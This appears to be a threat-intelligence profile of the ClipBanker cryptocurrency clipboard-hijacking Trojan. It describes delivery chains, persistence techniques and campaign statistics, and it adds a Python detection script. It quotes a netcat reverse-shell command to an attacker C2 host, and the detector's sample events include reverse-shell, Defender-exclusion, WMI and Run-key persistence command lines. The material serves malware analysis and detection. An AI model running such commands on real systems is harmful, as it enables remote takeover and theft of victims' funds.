ClipBanker
ClipBanker is a clipboard-hijacking cryptocurrency theft Trojan that monitors the victim’s clipboard for cryptocurrency wallet addresses and replaces them with attacker-controlled addresses. Across the provided reporting, it is consistently described as targeting crypto assets and wallet formats spanning numerous blockchain networks, including Bitcoin, Ethereum, Solana, Monero, Dogecoin, TRON, Ripple, Litecoin and many others.
Observed delivery and execution chains include fake software downloads, trojanized installers, phishing and ClickFix-style lures, fake CAPTCHA/reCAPTCHA verification pages, MSHTA-driven infection chains, SourceForge-hosted fake Microsoft Office downloads, and a fake GitHub repository distributing a trojanized Proxifier installer. In one SourceForge campaign, AutoIt-based components injected a miner and ClipBanker, while additional tooling established persistence, Telegram-based telemetry exfiltration, and a reverse shell to apap[.]app:445. In another campaign, the final ClipBanker payload was injected into fontdrvhost.exe after a long fileless chain involving Defender exclusions, in-memory PowerShell, registry-stored scripts, scheduled tasks, and payload retrieval from Pastebin-like services and GitHub.
Persistence mechanisms directly mentioned include Windows registry Run keys, scheduled tasks, App Paths registry hijacking, services, Image File Execution Options debugger abuse, WMI event filters/consumers, and registry-stored PowerShell launched at logon. One Kaspersky compromise-assessment case identified a ClipBanker variant persisting via HKU\S-1-5-21-[REDACTED]-500\Software\Microsoft\Windows\CurrentVersion\Run\9Er6IIp on a user workstation. Bitdefender also reported a ClipBanker chain using a remote HTA from asd[.]s7610rir[.]pw/win/checking[.]hta, downloading checking.ps1 from 185[.]208[.]159[.]199 and additional payloads including ichigo-lite.ps1 and del.ps1 from 87[.]96[.]21[.]84, with scheduled task names masquerading as legitimate services such as Optimize Start Menu Cache Files-S-3-5-21-2236678155-433529325-1142214968-1237.
Implementation details in the content include C++/MinGW builds, AutoIt-based loaders/injectors, and variants that may avoid network communication entirely once deployed, focusing solely on clipboard monitoring and address substitution. ClipBanker also appears as a module within LummaC2/LummaStealer-related activity, where it performs wallet-address replacement. It is additionally referenced in campaigns associated with ViperSoftX operators, alongside QuasarRAT and PureRAT, for cryptocurrency wallet theft and remote control.
Victimology in the provided material centers on cryptocurrency users and financially motivated campaigns. Kaspersky’s 2024 financial threat reporting states ClipBanker accounted for 62.9% of users attacked by financial PC malware in 2024. Campaign telemetry cited in the content includes more than 2,000 encountered users in a trojanized Proxifier campaign, mainly in India and Vietnam, and 4,604 users exposed to the SourceForge fake Office campaign, with 90% of potential victims in Russia.
Techniques & procedures
31 distinct techniques documented for this family, organized by ATT&CK tactic.
Resource Development (2 techniques)
Execution (7 techniques)
The role of this script is to ensure Windows Defender exclusions and persistence... The scheduled task names masquerade as services that sound legitimate.
This essentially creates a remote command line with apap[.]app:445 as the C2 server.
The VB script runs a PowerShell interpreter to download and execute a batch file, confvk, from GitHub.
This file contains the password for the RAR archive. It also unpacks malicious files and runs the next-stage script.
Persistence (6 techniques)
The role of this script is to ensure Windows Defender exclusions and persistence... The scheduled task names masquerade as services that sound legitimate.
The PowerShell script handles several key tasks: it ... stores an encoded script inside a registry key at HKLM\SOFTWARE\System::Config.
Then confvz creates services named NetworkConfiguration and PerformanceMonitor to autostart the batch files, and a service named Update to directly run the AutoIt interpreter
Using the built-in WMIC utility, an event filter is created to trigger a handler every 80 seconds... The handler executes the following command: ShellExperienceHost.exe --ssl apap[.]app 445 -e cmd.exe
Privilege Escalation (6 techniques)
The role of this script is to ensure Windows Defender exclusions and persistence... The scheduled task names masquerade as services that sound legitimate.
Icon.dll restarts the AutoIt interpreter and injects a miner into it, while Kape.dll does the same but injects ClipBanker.
Then confvz creates services named NetworkConfiguration and PerformanceMonitor to autostart the batch files, and a service named Update to directly run the AutoIt interpreter
Using the built-in WMIC utility, an event filter is created to trigger a handler every 80 seconds... The handler executes the following command: ShellExperienceHost.exe --ssl apap[.]app 445 -e cmd.exe
Stealth (10 techniques)
The HTA decodes the next payload from an array of character codes and launches it... The downloaded PowerShell script is heavily obfuscated... We observed obfuscation techniques unique to each campaign, aiming to mask keywords that trigger alerts in EDRs and SIEMs.
Attackers use the file pumping technique to inflate the file size by appending junk data. The file in question was padded with null bytes.
The downloaded archive contains another password-protected archive, installer.zip... Inside installer.zip is a file named installer.msi. This is a Windows Installer file that exceeds 700 megabytes. Apparently, the large size is intended to convince users they are looking at a genuine software installer.
Icon.dll restarts the AutoIt interpreter and injects a miner into it, while Kape.dll does the same but injects ClipBanker.
The script block contains a minimal JavaScript loader that implements a Base64 decoding function... The main function decodes and executes the embedded script.
The tool is MSHTA, short for Microsoft HTML Application Host, a built-in Windows utility that can run scripts from local files and remote internet locations... Attackers have been using it to deliver some of today’s most harmful malware... All use MSHTA as a stepping stone during early or middle stages of infection.
The script checks for processes associated with antivirus software, security solutions, virtual environments, and research tools. If it detects anything like that, it deletes itself.
This was done after adding the malware’s folder to Windows Defender exclusions and applying hidden and system attributes to the file to hide it from regular users.
Defense Impairment (1 technique)
Discovery (2 techniques)
Collection (2 techniques)
Command and Control (3 techniques)
One of the PowerShell scripts sends a message to a certain chat using the Telegram API.
The VB script runs a PowerShell interpreter to download and execute a batch file, confvk, from GitHub... The other PowerShell script downloads another batch file, confvz
ShellExperienceHost.exe is the netcat executable from the malicious archive. The arguments above make the utility establish an encrypted connection with the C2 server apap[.]app on port 445 and launch a command-line interpreter with redirected input/output through that connection.
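The execution and persistence steps quoted above (remote HTA via MSHTA, Defender exclusions, WMI event subscriptions, Run keys, IFEO debuggers, scheduled tasks, and a renamed netcat reverse shell) can be turned into process-creation detections. The following is an added example, not code from the page or from any vendor; the sample events, file paths, task and host names are constructed placeholders, and the rule names are assumptions rather than vendor rule titles.

```python
from __future__ import annotations
import re

# Detection rules for the ClipBanker delivery/persistence chain quoted above.
# Each rule is (name, regex applied to "<image path> <command line>").
RULES = [
    ("mshta launching a remote HTA",
     re.compile(r"mshta\.exe.*\bhttps?://", re.I)),
    ("Windows Defender exclusion added from a script",
     re.compile(r"Add-MpPreference\s+-Exclusion(Path|Process|Extension)", re.I)),
    ("WMI event filter/consumer persistence via wmic",
     re.compile(r"wmic\.exe.*(__EventFilter|CommandLineEventConsumer|__FilterToConsumerBinding)", re.I)),
    ("Run key persistence written from the command line",
     re.compile(r"(\breg(\.exe)?\s+add|Set-ItemProperty|New-ItemProperty).*CurrentVersion\\Run\b", re.I)),
    ("IFEO debugger hijack",
     re.compile(r"Image File Execution Options\\.*\bDebugger\b", re.I)),
    ("Scheduled task created from a script",
     re.compile(r"schtasks(\.exe)?\s+/create", re.I)),
]
# netcat-style arguments ('--ssl <host> <port>' or '-e cmd.exe') on a binary that is not named like netcat
NETCAT_ARGS = re.compile(r"(--ssl\s+\S+\s+\d{1,5}|\s-e\s+cmd(\.exe)?)", re.I)

def detect(image: str, cmdline: str) -> list[str]:
    """Return the names of every rule that fires on one process-creation event."""
    hits = [name for name, rx in RULES if rx.search(f"{image} {cmdline}")]
    basename = image.replace("\\", "/").rsplit("/", 1)[-1].lower()
    if NETCAT_ARGS.search(cmdline) and basename not in ("nc.exe", "ncat.exe", "nc64.exe"):
        hits.append(f"netcat-style reverse shell from renamed binary {basename}")
    return hits

# Constructed sample events (image, command line); hosts, paths and names are placeholders.
SAMPLE_EVENTS = [
    (r"C:\Windows\System32\mshta.exe", "mshta.exe http://example.invalid/win/checking.hta"),
    (r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     r'powershell -w hidden -c "Add-MpPreference -ExclusionPath C:\Users\Public\svc"'),
    (r"C:\Windows\System32\wbem\WMIC.exe",
     r'wmic /NAMESPACE:"\\root\subscription" PATH __EventFilter CREATE Name="upd", QueryLanguage="WQL"'),
    (r"C:\Users\Public\svc\ShellExperienceHost.exe",
     "ShellExperienceHost.exe --ssl c2.example.invalid 445 -e cmd.exe"),
    (r"C:\Windows\System32\reg.exe",
     r"reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v 9Er6IIp /t REG_SZ /d C:\Users\Public\svc\run.vbs"),
    (r"C:\Windows\explorer.exe", "explorer.exe"),  # benign, should not fire
]

def scan(events=SAMPLE_EVENTS) -> list[tuple[str, list[str]]]:
    """Return (command line, triggered rules) for every event that fired at least one rule."""
    return [(cmd, detect(img, cmd)) for img, cmd in events if detect(img, cmd)]

if __name__ == "__main__":
    for cmd, hits in scan():
        print(f"ALERT {hits} <- {cmd}")
```

The renamed-netcat rule deliberately ignores binaries named like netcat so that legitimate admin use is not flagged by the masquerade check; stack it with the Run-key and WMI rules to catch the chain rather than any single step.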
IOCs tracked for this family
48 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
Recent activity
11 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
A stealer detected on a user workstation; it persisted via the Windows registry, added itself to Windows Defender exclusions, and masked itself with the hidden/system attributes.
A data stealer variant observed persisting via a Windows Run registry key after adding its folder to Windows Defender exclusions and hiding the file with hidden/system attributes.
A malware family observed in MSHTA-enabled campaigns; the article provides IoCs but limited behavioral detail. Based on the name and context, it is discussed as a distinct payload/tool in these infection chains.
Clipboard-hijacking trojan that monitors copied cryptocurrency wallet addresses and replaces them with attacker-controlled addresses to steal funds across multiple blockchain networks.